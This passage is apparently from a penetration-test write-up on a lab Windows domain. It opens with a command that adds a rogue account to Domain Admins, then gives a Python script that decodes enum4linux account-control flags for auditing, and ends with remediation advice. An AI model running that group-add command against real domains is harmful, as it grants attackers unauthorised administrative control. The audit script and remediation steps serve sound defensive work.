C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain
net group "Domain Admins" twadmin /add /domain
The request will be processed at a domain controller for domain MIRKWOOD.
The command completed successfully.
```
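The acb values in the enum4linux user listing above are the SAM account-control flags, and they are exactly what the "account audit" in the remediation list below should look at: password-not-required, never-expiring passwords, no Kerberos pre-authentication, and disabled accounts that are still in Domain Admins (gollum here). The following added example (not code from the SpiderLabs post or enum4linux) decodes those flags from a dump in that format and cross-checks them against the Domain Admins membership lines; the flag names follow Samba's samr AcctFlags, the "risky" set is my choice, and the sample is constructed from lines in the shape of the dump above.

```python
"""Decode acb (account control) flags from an enum4linux/rpcclient user listing and
cross-check them against Domain Admins membership. Added example, not enum4linux code."""
import re

# samr AcctFlags bits, named as Samba does; enum4linux prints the raw value as acb:.
ACB_FLAGS = {
    0x00000001: "DISABLED", 0x00000002: "HOMDIRREQ", 0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP", 0x00000010: "NORMAL", 0x00000020: "MNS",
    0x00000040: "DOMTRUST", 0x00000080: "WSTRUST", 0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP", 0x00000400: "AUTOLOCK", 0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED", 0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED", 0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH", 0x00020000: "PW_EXPIRED",
    0x00080000: "NO_AUTH_DATA_REQD", 0x00100000: "PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "USE_AES_KEYS",
}
# Flags an auditor should question on any enabled account (my choice, not a standard).
RISKY = {"PWNOTREQ", "PWNOEXP", "DONT_REQUIRE_PREAUTH", "TRUSTED_FOR_DELEGATION"}

USER_RE = re.compile(r"index:\s*\S+\s+RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)\s+Account:\s*(\S+)", re.I)
DA_RE = re.compile(r"Group 'Domain Admins' \(RID: 512\) has member: [^\\\s]+\\(\S+)")

def decode_acb(value):
    """Set of flag names for an acb value; bits not in the table are kept as hex."""
    names = {name for bit, name in ACB_FLAGS.items() if value & bit}
    leftover = value & ~sum(ACB_FLAGS)
    if leftover:
        names.add(hex(leftover))
    return names

def parse_users(text):
    """One record per 'index: ... RID: ... acb: ... Account: ...' line."""
    users = []
    for m in USER_RE.finditer(text):
        flags = decode_acb(int(m.group(2), 16))
        users.append({"account": m.group(3), "rid": int(m.group(1), 16), "flags": flags,
                      "risky": sorted(flags & RISKY), "disabled": "DISABLED" in flags})
    return users

def audit(text):
    """(account, issue) pairs: enabled accounts with risky flags, and Domain Admins
    members that are disabled but never removed from the group."""
    admins = {m.lower() for m in DA_RE.findall(text)}
    findings = []
    for u in parse_users(text):
        if u["risky"] and not u["disabled"]:
            findings.append((u["account"], "enabled with " + ",".join(u["risky"])))
        if u["account"].lower() in admins and u["disabled"]:
            findings.append((u["account"], "disabled account still in Domain Admins"))
    return findings

# Constructed sample in the shape of the enum4linux dump above.
SAMPLE_ENUM = r"""
index: 0x2b76 RID: 0xd08 acb: 0x00000610 Account: Administrator  Name: Administrator  Desc: (null)
index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo  Name: Frodo Baggins  Desc: (null)
index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder  Name: Aragorn  Desc: (null)
index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf  Name: Gandalf the Gray  Desc: (null)
index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: Gollum  Name: gollum  Desc: (null)
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\Gandalf
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\Stryder
Group 'Domain Admins' (RID: 512) has member: MIRKWOOD\gollum
"""

if __name__ == "__main__":
    for account, issue in audit(SAMPLE_ENUM):
        print(f"{account}: {issue}")
```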

Remediation (I really don't want administrators to read this part):

1. Use XP/Win2K less; otherwise NetBIOS and LLMNR can rarely be disabled completely, for compatibility reasons, and name poisoning stays possible.

2. Download software installers from well-known sites, and change the software's default passwords.

3. Install patches diligently, across the whole estate.

4. Do account audits.

5. Disable null sessions, and put key servers in their own VLANs.